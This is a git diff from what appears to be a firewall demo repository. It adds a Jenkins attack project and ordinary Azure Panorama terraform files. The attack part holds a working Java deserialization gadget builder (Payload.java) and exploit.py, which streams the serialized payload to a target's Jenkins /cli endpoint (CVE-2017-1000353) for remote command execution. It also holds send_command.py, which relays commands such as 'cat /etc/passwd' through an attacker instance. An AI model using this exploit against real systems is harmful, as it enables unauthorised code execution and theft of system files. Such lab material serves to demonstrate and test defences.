+ Signature signature = Signature.getInstance(privateKey.getAlgorithm());
+ SignedObject payload = new SignedObject(map, privateKey, signature);
+ JSONArray array = new JSONArray();
+
+ array.add("asdf");
+
+ ListOrderedSet set = new ListOrderedSet();
+ Field f1 = AbstractCollectionDecorator.class
+ .getDeclaredField("collection");
+ f1.setAccessible(true);
+ f1.set(set, array);
+
+ DummyComperator comp = new DummyComperator();
+ ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
+ csls.add(payload);
+
+ CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
+ CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
+
+ a1.add(set);
+ Container c = new Container(csls);
+ a1.add(c);
+
+ a2.add(csls);
+ a2.add(set);
+
+ ReferenceMap flat3map = new ReferenceMap();
+ flat3map.put(new Container(a1), "asdf");
+ flat3map.put(new Container(a2), "asdf");
+
+ return flat3map;
+ }
+
+ private Object writeReplace() throws ObjectStreamException {
+ return this.payload;
+ }
+
+ static class Container implements Serializable {
+
+ private Object o;
+
+ public Container(Object o) {
+ this.o = o;
+ }
+
+ private Object writeReplace() throws ObjectStreamException {
+ return o;
+ }
+
+ }
+
+ static class DummyComperator implements Comparator, Serializable {
+
+ public int compare(Object arg0, Object arg1) {
+ // treat all elements as equal; only needed to satisfy the ConcurrentSkipListSet constructor
+ return 0;
+ }
+
+ private Object writeReplace() throws ObjectStreamException {
+ return null;
+ }
+
+ }
+
+ public static void main(String args[]) throws Exception{
+
+ if(args.length != 2){
+ System.out.println("java -jar payload.jar outfile cmd");
+ System.exit(0);
+ }
+
+ String cmd = args[1];
+ FileOutputStream out = new FileOutputStream(args[0]);
+
+ Payload pwn = new Payload(cmd);
+ ObjectOutputStream oos = new ObjectOutputStream(out);
+ oos.writeObject(pwn);
+ oos.flush();
+ out.flush();
+
+
+ }
+
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar
new file mode 100644
index 00000000..218510bc
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar
new file mode 100644
index 00000000..c35fa1fe
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar
new file mode 100644
index 00000000..98467d3a
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar
new file mode 100644
index 00000000..93a3b9f6
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar differ
diff --git a/azure/Jenkins_proj-working/payload/exploit.py b/azure/Jenkins_proj-working/payload/exploit.py
new file mode 100644
index 00000000..89c789d4
--- /dev/null
+++ b/azure/Jenkins_proj-working/payload/exploit.py
@@ -0,0 +1,92 @@
+import requests
+import uuid
+import threading
+import time
+
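+# The flow below follows the publicly documented Jenkins CLI deserialization
+# technique (believed to correspond to CVE-2017-1000353): a 'download' channel is
+# opened first, then the serialized gadget (payload.ser, produced by Payload.java)
+# is streamed to the 'upload' side using chunked transfer encoding.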
+proxies = {
+# 'http': 'http://127.0.0.1:8085',
+# 'https': 'http://127.0.0.1:8090',
+}
+
+TARGET = input("Enter Jenkins Target IP Address: ")
+URL='http://' + TARGET + ':80/cli'
+
+PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
+PROTO = b'\x00\x00\x00\x00'
+
+
+FILE_SER = open("payload.ser", "rb").read()
+
+def download(url, session):
+
+ headers = {'Side' : 'download'}
+ #headers['Content-type'] = 'application/x-www-form-urlencoded'
+ headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+ headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+ headers['Session'] = session
+ headers['Transfer-Encoding'] = 'chunked'
+ r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)
+ print(r.content)
+
+
+def upload(url, session, data):
+
+ headers = {'Side' : 'upload'}
+ headers['Session'] = session
+ #headers['Content-type'] = 'application/octet-stream'
+ headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+ #headers['Content-Length'] = '335'
+ headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+ headers['Accept-Encoding'] = None
+ r = requests.post(url,data=data,headers=headers,proxies=proxies)
+
+
+def upload_chunked(url,session, data):
+
+ headers = {'Side' : 'upload'}
+ headers['Session'] = session
+ #headers['Content-type'] = 'application/octet-stream'
+ headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+ #headers['Content-Length'] = '335'
+ headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+ headers['Accept-Encoding']= None
+ headers['Transfer-Encoding'] = 'chunked'
+ headers['Cache-Control'] = 'no-cache'
+
+ r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)
+
+
+def null_payload():
+ yield b" "
+
+def create_payload():
+ payload = PREAMBLE + PROTO + FILE_SER
+
+ return payload
+
+def create_payload_chunked():
+ yield PREAMBLE
+ yield PROTO
+ yield FILE_SER
+
+def main():
+ print("start")
+
+ session = str(uuid.uuid4())
+
+ t = threading.Thread(target=download, args=(URL, session))
+ t.start()
+
+ time.sleep(1)
+ print("pwn")
+ #upload(URL, session, create_payload())
+
+ upload_chunked(URL, session, "asdf")
+
+if __name__ == "__main__":
+ main()
diff --git a/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar
new file mode 100644
index 00000000..30fad12d
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar differ
diff --git a/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar
new file mode 100644
index 00000000..a47f128a
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar differ
diff --git a/azure/Jenkins_proj-working/payload/payload.jar b/azure/Jenkins_proj-working/payload/payload.jar
new file mode 100644
index 00000000..51e0bcc9
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/payload.jar differ
diff --git a/azure/Jenkins_proj-working/requirements.txt b/azure/Jenkins_proj-working/requirements.txt
new file mode 100644
index 00000000..c36b3a97
--- /dev/null
+++ b/azure/Jenkins_proj-working/requirements.txt
@@ -0,0 +1,227 @@
+adal==1.2.1
+amqp==2.4.2
+antlr4-python3-runtime==4.7.2
+applicationinsights==0.11.7
+argcomplete==1.9.5
+asgiref==3.0.0
+asn1crypto==0.24.0
+async-timeout==3.0.1
+atomicwrites==1.3.0
+attrs==19.1.0
+autobahn==19.3.3
+Automat==0.7.0
+azure-batch==6.0.0
+azure-cli==2.0.63
+azure-cli-acr==2.2.5
+azure-cli-acs==2.3.22
+azure-cli-advisor==2.0.0
+azure-cli-ams==0.4.5
+azure-cli-appservice==0.2.18
+azure-cli-backup==1.2.4
+azure-cli-batch==4.0.0
+azure-cli-batchai==0.4.8
+azure-cli-billing==0.2.1
+azure-cli-botservice==0.1.10
+azure-cli-cdn==0.2.3
+azure-cli-cloud==2.1.1
+azure-cli-cognitiveservices==0.2.5
+azure-cli-command-modules-nspkg==2.0.2
+azure-cli-configure==2.0.22
+azure-cli-consumption==0.4.2
+azure-cli-container==0.3.16
+azure-cli-core==2.0.63
+azure-cli-cosmosdb==0.2.10
+azure-cli-deploymentmanager==0.1.0
+azure-cli-dla==0.2.5
+azure-cli-dls==0.1.9
+azure-cli-dms==0.1.3
+azure-cli-eventgrid==0.2.3
+azure-cli-eventhubs==0.3.4
+azure-cli-extension==0.2.5
+azure-cli-feedback==2.2.1
+azure-cli-find==0.3.2
+azure-cli-hdinsight==0.3.3
+azure-cli-interactive==0.4.3
+azure-cli-iot==0.3.8
+azure-cli-iotcentral==0.1.6
+azure-cli-keyvault==2.2.14
+azure-cli-kusto==0.2.2
+azure-cli-lab==0.1.7
+azure-cli-maps==0.3.4
+azure-cli-monitor==0.2.13
+azure-cli-network==2.3.7
+azure-cli-nspkg==3.0.3
+azure-cli-policyinsights==0.1.2
+azure-cli-privatedns==1.0.0
+azure-cli-profile==2.1.5
+azure-cli-rdbms==0.3.10
+azure-cli-redis==0.4.2
+azure-cli-relay==0.1.4
+azure-cli-reservations==0.4.2
+azure-cli-resource==2.1.14
+azure-cli-role==2.6.0
+azure-cli-search==0.1.1
+azure-cli-security==0.1.1
+azure-cli-servicebus==0.3.4
+azure-cli-servicefabric==0.1.17
+azure-cli-signalr==1.0.0
+azure-cli-sql==2.2.2
+azure-cli-sqlvm==0.1.1
+azure-cli-storage==2.4.1
+azure-cli-telemetry==1.0.2
+azure-cli-vm==2.2.19
+azure-common==1.1.20
+azure-datalake-store==0.0.39
+azure-functions-devops-build==0.0.21
+azure-graphrbac==0.60.0
+azure-keyvault==1.1.0
+azure-mgmt-advisor==2.0.1
+azure-mgmt-applicationinsights==0.1.1
+azure-mgmt-authorization==0.50.0
+azure-mgmt-batch==6.0.0
+azure-mgmt-batchai==2.0.0
+azure-mgmt-billing==0.2.0
+azure-mgmt-botservice==0.1.0
+azure-mgmt-cdn==3.1.0
+azure-mgmt-cognitiveservices==3.0.0
+azure-mgmt-compute==4.6.1
+azure-mgmt-consumption==2.0.0
+azure-mgmt-containerinstance==1.4.0
+azure-mgmt-containerregistry==2.7.0
+azure-mgmt-containerservice==4.4.0
+azure-mgmt-cosmosdb==0.5.2
+azure-mgmt-datalake-analytics==0.2.1
+azure-mgmt-datalake-nspkg==3.0.1
+azure-mgmt-datalake-store==0.5.0
+azure-mgmt-datamigration==0.1.0
+azure-mgmt-deploymentmanager==0.1.0
+azure-mgmt-devtestlabs==2.2.0
+azure-mgmt-dns==2.1.0
+azure-mgmt-eventgrid==2.0.0
+azure-mgmt-eventhub==2.3.0
+azure-mgmt-hdinsight==0.2.1
+azure-mgmt-iotcentral==1.0.0
+azure-mgmt-iothub==0.7.0
+azure-mgmt-iothubprovisioningservices==0.2.0
+azure-mgmt-keyvault==1.1.0
+azure-mgmt-kusto==0.3.0
+azure-mgmt-loganalytics==0.2.0
+azure-mgmt-managementgroups==0.1.0
+azure-mgmt-maps==0.1.0
+azure-mgmt-marketplaceordering==0.1.0
+azure-mgmt-media==1.1.1
+azure-mgmt-monitor==0.5.2
+azure-mgmt-msi==0.2.0
+azure-mgmt-network==2.6.0
+azure-mgmt-nspkg==3.0.2
+azure-mgmt-policyinsights==0.2.0
+azure-mgmt-privatedns==0.1.0
+azure-mgmt-rdbms==1.7.1
+azure-mgmt-recoveryservices==0.1.1
+azure-mgmt-recoveryservicesbackup==0.1.2
+azure-mgmt-redis==6.0.0
+azure-mgmt-relay==0.1.0
+azure-mgmt-reservations==0.3.1
+azure-mgmt-resource==2.1.0
+azure-mgmt-search==2.0.0
+azure-mgmt-security==0.1.0
+azure-mgmt-servicebus==0.5.3
+azure-mgmt-servicefabric==0.2.0
+azure-mgmt-signalr==0.1.1
+azure-mgmt-sql==0.12.0
+azure-mgmt-sqlvirtualmachine==0.2.0
+azure-mgmt-storage==3.1.1
+azure-mgmt-trafficmanager==0.51.0
+azure-mgmt-web==0.41.0
+azure-multiapi-storage==0.2.3
+azure-nspkg==3.0.2
+azure-storage==0.36.0
+azure-storage-blob==1.3.1
+azure-storage-common==1.4.0
+azure-storage-file==1.4.0
+azure-storage-nspkg==3.1.0
+bcrypt==3.1.6
+billiard==3.6.0.0
+celery==4.3.0
+certifi==2019.3.9
+cffi==1.12.3
+chardet==3.0.4
+collections2==0.3.0
+colorama==0.4.1
+constantly==15.1.0
+cryptography==2.4.2
+decorator==4.4.0
+Django==2.2.4
+django-widget-tweaks==1.4.3
+docker==3.7.2
+docker-pycreds==0.4.0
+fabric==2.4.0
+gitdb2==2.0.5
+GitPython==2.1.11
+gunicorn==19.9.0
+humanfriendly==4.18
+hyperlink==18.0.0
+idna==2.8
+incremental==17.5.0
+invoke==1.2.0
+ipaddress==1.0.22
+isodate==0.6.0
+Jinja2==2.10.1
+jmespath==0.9.4
+jsonpath-ng==1.4.3
+knack==0.5.4
+kombu==4.5.0
+MarkupSafe==1.1.1
+mock==2.0.0
+more-itertools==7.0.0
+msrest==0.6.6
+msrestazure==0.6.0
+oauthlib==3.0.1
+oyaml==0.9
+pan-python==0.14.0
+pandevice==0.6.6
+paramiko==2.4.2
+passlib==1.7.1
+pbr==5.2.0
+pluggy==0.9.0
+ply==3.11
+portalocker==1.2.1
+prompt-toolkit==1.0.15
+psutil==5.6.6
+py==1.8.0
+pyAesCrypt==0.4.2
+pyasn1==0.4.5
+pycparser==2.19
+pydocumentdb==2.3.3
+Pygments==2.3.1
+PyHamcrest==1.9.0
+PyJWT==1.7.1
+PyNaCl==1.3.0
+pyOpenSSL==19.0.0
+pyperclip==1.7.0
+pytest==4.4.0
+pytest-django==3.4.8
+python-dateutil==2.8.0
+python-terraform==0.10.0
+pytz==2019.1
+PyYAML==5.1
+requests==2.21.0
+requests-oauthlib==1.2.0
+scp==0.13.2
+six==1.12.0
+smmap2==2.0.5
+sqlparse==0.3.0
+sshtunnel==0.1.4
+tabulate==0.8.3
+Twisted==18.9.0
+txaio==18.8.1
+urllib3==1.24.2
+vine==1.3.0
+virtualenv==16.4.3
+virtualenv-clone==0.5.2
+vsts==0.1.25
+vsts-cd-manager==1.0.2
+wcwidth==0.1.7
+websocket-client==0.56.0
+xmltodict==0.12.0
+zope.interface==4.6.0
diff --git a/azure/Jenkins_proj-working/requirementsold2.txt b/azure/Jenkins_proj-working/requirementsold2.txt
new file mode 100644
index 00000000..68742357
--- /dev/null
+++ b/azure/Jenkins_proj-working/requirementsold2.txt
@@ -0,0 +1,222 @@
+adal==1.2.1
+amqp==2.4.2
+antlr4-python3-runtime==4.7.2
+applicationinsights==0.11.8
+argcomplete==1.9.5
+asgiref==3.0.0
+asn1crypto==0.24.0
+async-timeout==3.0.1
+atomicwrites==1.3.0
+attrs==19.1.0
+autobahn==19.3.3
+Automat==0.7.0
+azure-batch==6.0.0
+azure-cli==2.0.63
+azure-cli-acr==2.2.5
+azure-cli-acs==2.3.22
+azure-cli-advisor==2.0.0
+azure-cli-ams==0.4.5
+azure-cli-appservice==0.2.18
+azure-cli-backup==1.2.4
+azure-cli-batch==4.0.0
+azure-cli-batchai==0.4.8
+azure-cli-billing==0.2.1
+azure-cli-botservice==0.1.10
+azure-cli-cdn==0.2.3
+azure-cli-cloud==2.1.1
+azure-cli-cognitiveservices==0.2.5
+azure-cli-command-modules-nspkg==2.0.2
+azure-cli-configure==2.0.22
+azure-cli-consumption==0.4.2
+azure-cli-container==0.3.16
+azure-cli-core==2.0.63
+azure-cli-cosmosdb==0.2.10
+azure-cli-deploymentmanager==0.1.0
+azure-cli-dla==0.2.5
+azure-cli-dls==0.1.9
+azure-cli-dms==0.1.3
+azure-cli-eventgrid==0.2.3
+azure-cli-eventhubs==0.3.4
+azure-cli-extension==0.2.5
+azure-cli-feedback==2.2.1
+azure-cli-find==0.3.2
+azure-cli-hdinsight==0.3.3
+azure-cli-interactive==0.4.3
+azure-cli-iot==0.3.8
+azure-cli-iotcentral==0.1.6
+azure-cli-keyvault==2.2.14
+azure-cli-kusto==0.2.2
+azure-cli-lab==0.1.7
+azure-cli-maps==0.3.4
+azure-cli-monitor==0.2.13
+azure-cli-network==2.3.7
+azure-cli-nspkg==3.0.3
+azure-cli-policyinsights==0.1.2
+azure-cli-privatedns==1.0.0
+azure-cli-profile==2.1.5
+azure-cli-rdbms==0.3.10
+azure-cli-redis==0.4.2
+azure-cli-relay==0.1.4
+azure-cli-reservations==0.4.2
+azure-cli-resource==2.1.14
+azure-cli-role==2.6.0
+azure-cli-search==0.1.1
+azure-cli-security==0.1.1
+azure-cli-servicebus==0.3.4
+azure-cli-servicefabric==0.1.17
+azure-cli-signalr==1.0.0
+azure-cli-sql==2.2.2
+azure-cli-sqlvm==0.1.1
+azure-cli-storage==2.4.1
+azure-cli-telemetry==1.0.2
+azure-cli-vm==2.2.19
+azure-common==1.1.20
+azure-datalake-store==0.0.39
+azure-functions-devops-build==0.0.21
+azure-graphrbac==0.60.0
+azure-keyvault==1.1.0
+azure-mgmt-advisor==2.0.1
+azure-mgmt-applicationinsights==0.1.1
+azure-mgmt-authorization==0.50.0
+azure-mgmt-batch==6.0.0
+azure-mgmt-batchai==2.0.0
+azure-mgmt-billing==0.2.0
+azure-mgmt-botservice==0.1.0
+azure-mgmt-cdn==3.1.0
+azure-mgmt-cognitiveservices==3.0.0
+azure-mgmt-compute==4.6.1
+azure-mgmt-consumption==2.0.0
+azure-mgmt-containerinstance==1.4.0
+azure-mgmt-containerregistry==2.7.0
+azure-mgmt-containerservice==4.4.0
+azure-mgmt-cosmosdb==0.5.2
+azure-mgmt-datalake-analytics==0.2.1
+azure-mgmt-datalake-nspkg==3.0.1
+azure-mgmt-datalake-store==0.5.0
+azure-mgmt-datamigration==0.1.0
+azure-mgmt-deploymentmanager==0.1.0
+azure-mgmt-devtestlabs==2.2.0
+azure-mgmt-dns==2.1.0
+azure-mgmt-eventgrid==2.0.0
+azure-mgmt-eventhub==2.3.0
+azure-mgmt-hdinsight==0.2.1
+azure-mgmt-iotcentral==1.0.0
+azure-mgmt-iothub==0.7.0
+azure-mgmt-iothubprovisioningservices==0.2.0
+azure-mgmt-keyvault==1.1.0
+azure-mgmt-kusto==0.3.0
+azure-mgmt-loganalytics==0.2.0
+azure-mgmt-managementgroups==0.1.0
+azure-mgmt-maps==0.1.0
+azure-mgmt-marketplaceordering==0.1.0
+azure-mgmt-media==1.1.1
+azure-mgmt-monitor==0.5.2
+azure-mgmt-msi==0.2.0
+azure-mgmt-network==2.6.0
+azure-mgmt-nspkg==3.0.2
+azure-mgmt-policyinsights==0.2.0
+azure-mgmt-privatedns==0.1.0
+azure-mgmt-rdbms==1.7.1
+azure-mgmt-recoveryservices==0.1.1
+azure-mgmt-recoveryservicesbackup==0.1.2
+azure-mgmt-redis==6.0.0
+azure-mgmt-relay==0.1.0
+azure-mgmt-reservations==0.3.1
+azure-mgmt-resource==2.1.0
+azure-mgmt-search==2.0.0
+azure-mgmt-security==0.1.0
+azure-mgmt-servicebus==0.5.3
+azure-mgmt-servicefabric==0.2.0
+azure-mgmt-signalr==0.1.1
+azure-mgmt-sql==0.12.0
+azure-mgmt-sqlvirtualmachine==0.2.0
+azure-mgmt-storage==3.1.1
+azure-mgmt-trafficmanager==0.51.0
+azure-mgmt-web==0.41.0
+azure-multiapi-storage==0.2.3
+azure-nspkg==3.0.2
+azure-storage-blob==1.3.1
+azure-storage-common==1.4.0
+azure-storage-nspkg==3.1.0
+bcrypt==3.1.6
+billiard==3.6.0.0
+celery==4.3.0
+certifi==2019.3.9
+cffi==1.12.3
+chardet==3.0.4
+colorama==0.4.1
+constantly==15.1.0
+cryptography==2.4.2
+decorator==4.4.0
+Django==2.2
+django-widget-tweaks==1.4.3
+docker==3.7.2
+docker-pycreds==0.4.0
+fabric==2.4.0
+gitdb2==2.0.5
+GitPython==2.1.11
+gunicorn==19.9.0
+humanfriendly==4.18
+hyperlink==18.0.0
+idna==2.8
+incremental==17.5.0
+invoke==1.2.0
+ipaddress==1.0.22
+isodate==0.6.0
+Jinja2==2.10.1
+jmespath==0.9.4
+jsonpath-ng==1.4.3
+knack==0.5.4
+kombu==4.5.0
+MarkupSafe==1.1.1
+mock==2.0.0
+more-itertools==7.0.0
+msrest==0.6.6
+msrestazure==0.6.0
+oauthlib==3.0.1
+oyaml==0.9
+pan-python==0.14.0
+paramiko==2.4.2
+passlib==1.7.1
+pbr==5.2.0
+pluggy==0.9.0
+ply==3.11
+portalocker==1.4.0
+prompt-toolkit==2.0.9
+psutil==5.6.6
+py==1.8.0
+pyAesCrypt==0.4.2
+pyasn1==0.4.5
+pycparser==2.19
+pydocumentdb==2.3.3
+Pygments==2.3.1
+PyHamcrest==1.9.0
+PyJWT==1.7.1
+PyNaCl==1.3.0
+pyOpenSSL==19.0.0
+pyperclip==1.7.0
+pytest==4.4.0
+pytest-django==3.4.8
+python-dateutil==2.8.0
+pytz==2019.1
+PyYAML==5.1
+requests==2.21.0
+requests-oauthlib==1.2.0
+scp==0.13.2
+six==1.12.0
+smmap2==2.0.5
+sqlparse==0.3.0
+sshtunnel==0.1.4
+tabulate==0.8.3
+Twisted==18.9.0
+txaio==18.8.1
+urllib3==1.24.2
+vine==1.3.0
+virtualenv==16.4.3
+virtualenv-clone==0.5.2
+vsts==0.1.25
+vsts-cd-manager==1.0.2
+wcwidth==0.1.7
+websocket-client==0.56.0
+xmltodict==0.12.0
+zope.interface==4.6.0
diff --git a/azure/Jenkins_proj-working/send_command.py b/azure/Jenkins_proj-working/send_command.py
new file mode 100644
index 00000000..cbccbdfb
--- /dev/null
+++ b/azure/Jenkins_proj-working/send_command.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
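+# Assumed invocation (matches the -c/--cli argument parsed below):
+#   python3 send_command.py -c 'cat /etc/passwd'
+# The command string is forwarded to the attacker instance's /send endpoint.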
+
+def get_terraform_outputs() -> dict:
+    tf = Terraform(working_dir='./WebInDeploy')
+    rc, out, err = tf.cmd('output', '-json')
+
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError:
+            print('Could not parse terraform outputs!')
+
+    return dict()
+
+
+def main(cli: str) -> None:
+
+    print('Attempting to send command...\n')
+    outputs = get_terraform_outputs()
+
+    if 'ATTACKER_IP' not in outputs:
+        print('No attacker ip found in tf outputs!')
+        sys.exit(1)
+
+    attacker = outputs['ATTACKER_IP']['value']
+    payload = dict()
+    payload['cli'] = cli
+
+    headers = dict()
+    headers['Content-Type'] = 'application/json'
+    headers['Accept'] = '*/*'
+
+    try:
+        resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers)
+        if resp.status_code == 200:
+            print('Command Successfully Executed!\n')
+            print(resp.text)
+            sys.exit(0)
+        else:
+            print('Could not Execute Command!\n')
+            print(resp.text)
+            sys.exit(1)
+    except requests.exceptions.ConnectionError:
+        print('Could not connect to attacker instance!')
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Send Jenkins Attack Command')
+ parser.add_argument('-c', '--cli', help='Attack Command', required=True)
+ parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False)
+
+ args = parser.parse_args()
+ cli = args.cli
+ mcli = args.manual_cli
+
+ if mcli is not None and mcli != '':
+ main(mcli)
+ else:
+ main(cli)
+
diff --git a/azure/panorama_new_rg/README.md b/azure/panorama_new_rg/README.md
new file mode 100644
index 00000000..79c46c20
--- /dev/null
+++ b/azure/panorama_new_rg/README.md
@@ -0,0 +1,107 @@
+# Azure Panorama
+
+Terraform creates an instance of Panorama in a new Resource Group.
+
+## Prerequisites
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+
+## Caveats
+You will need to determine the available versions of Panorama using the Azure CLI. The following command lists the Panorama versions currently available:
+
+```
+bash-4.3# az vm image list -p paloaltonetworks -f panorama --all
+[
+ {
+ "offer": "panorama",
+ "publisher": "paloaltonetworks",
+ "sku": "byol",
+ "urn": "paloaltonetworks:panorama:byol:8.1.0",
+ "version": "8.1.0"
+ },
+ {
+ "offer": "panorama",
+ "publisher": "paloaltonetworks",
+ "sku": "byol",
+ "urn": "paloaltonetworks:panorama:byol:8.1.2",
+ "version": "8.1.2"
+ },
+ {
+ "offer": "panorama",
+ "publisher": "paloaltonetworks",
+ "sku": "byol",
+ "urn": "paloaltonetworks:panorama:byol:9.1.1",
+ "version": "9.1.1"
+ }
+]
+```
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following command (**BASH ONLY!**):
+```
+# Accept VM-Series EULA for desired currently-available version of Panorama (see above command for urn)
+$ az vm image terms accept --urn paloaltonetworks:panorama:byol:8.1.2
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/panorama_new_rg
+```
+
+### 2. Edit variables.tf or create terraform.tfvars
+The variables.tf file contains default settings for the template. Edit it to suit your requirements, or copy terraform.tfvars.sample to terraform.tfvars to override some or all of the defaults; a sample terraform.tfvars is shown after the variable descriptions below.
+
+Variable descriptions:
+
+ virtualMachineRG = Name of resource group to create
+
+ Location = Target Azure region
+
+ virtualNetworkName = Virtual Network Name
+
+ addressPrefix = VNet CIDR
+
+ subnetName = Subnet name in the VNet
+
+ subnet = Subnet CIDR
+
+ publicIpAddressName = Panorama public IP address name
+
+ networkInterfaceName = Panorama network interface name
+
+ networkSecurityGroupName = Network Security Group (NSG) name
+
+ diagnosticsStorageAccountName = Diagnostics Storage Account name
+
+ diagnosticsStorageAccountTier = Diagnostics Storage Account tier
+
+ diagnosticsStorageAccountReplication = Diagnostics Storage Account replication
+
+ virtualMachineName = Panorama VM name
+
+ virtualMachineSize = Panorama VM size
+
+ panoramaVersion = Panorama Version
+
+ adminUsername = Admin Username
+
+ adminPassword = Admin Password
+
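+A sample terraform.tfvars (illustrative values only; substitute your own names, CIDRs, and credentials) might look like:
+
+```
+virtualMachineRG                     = "panorama-rg"
+Location                             = "centralus"
+virtualNetworkName                   = "panorama-vnet"
+addressPrefix                        = "10.5.0.0/24"
+subnetName                           = "panorama"
+subnet                               = "10.5.0.0/24"
+publicIpAddressName                  = "panorama-pip"
+networkInterfaceName                 = "panorama-nic"
+networkSecurityGroupName             = "panorama-nsg"
+diagnosticsStorageAccountName        = "panoramadiag"
+diagnosticsStorageAccountTier        = "Standard"
+diagnosticsStorageAccountReplication = "LRS"
+virtualMachineName                   = "panorama"
+virtualMachineSize                   = "Standard_D3"
+panoramaVersion                      = "8.1.2"
+adminUsername                        = "panadmin"
+adminPassword                        = "<your-password>"
+```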
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/panorama_new_rg/interfaces.tf b/azure/panorama_new_rg/interfaces.tf
new file mode 100644
index 00000000..f971b4e5
--- /dev/null
+++ b/azure/panorama_new_rg/interfaces.tf
@@ -0,0 +1,14 @@
+#### CREATE THE NETWORK INTERFACES ####
+
+resource "azurerm_network_interface" "panorama" {
+ name = "${var.networkInterfaceName}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ ip_configuration {
+ name = "${var.networkInterfaceName}"
+ subnet_id = "${azurerm_subnet.panorama.id}"
+ private_ip_address_allocation = "Dynamic"
+ public_ip_address_id = "${azurerm_public_ip.panorama.id}"
+ }
+ depends_on = ["azurerm_public_ip.panorama"]
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/nsg.tf b/azure/panorama_new_rg/nsg.tf
new file mode 100644
index 00000000..4e454d84
--- /dev/null
+++ b/azure/panorama_new_rg/nsg.tf
@@ -0,0 +1,32 @@
+resource "azurerm_network_security_group" "panorama" {
+ name = "${var.networkSecurityGroupName}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+
+ security_rule {
+ name = "TCP-22"
+ priority = 100
+ direction = "Inbound"
+ access = "Allow"
+ protocol = "*"
+ source_port_range = "*"
+ destination_port_range = "22"
+ source_address_prefix = "*"
+ destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}"
+ }
+ security_rule {
+ name = "TCP-443"
+ priority = 110
+ direction = "Inbound"
+ access = "Allow"
+ protocol = "*"
+ source_port_range = "*"
+ destination_port_range = "443"
+ source_address_prefix = "*"
+ destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}"
+ }
+}
+resource "azurerm_subnet_network_security_group_association" "panorama" {
+ subnet_id = "${azurerm_subnet.panorama.id}"
+ network_security_group_id = "${azurerm_network_security_group.panorama.id}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/outputs.tf b/azure/panorama_new_rg/outputs.tf
new file mode 100644
index 00000000..b23d093b
--- /dev/null
+++ b/azure/panorama_new_rg/outputs.tf
@@ -0,0 +1,3 @@
+output "Panorama Public IP:" {
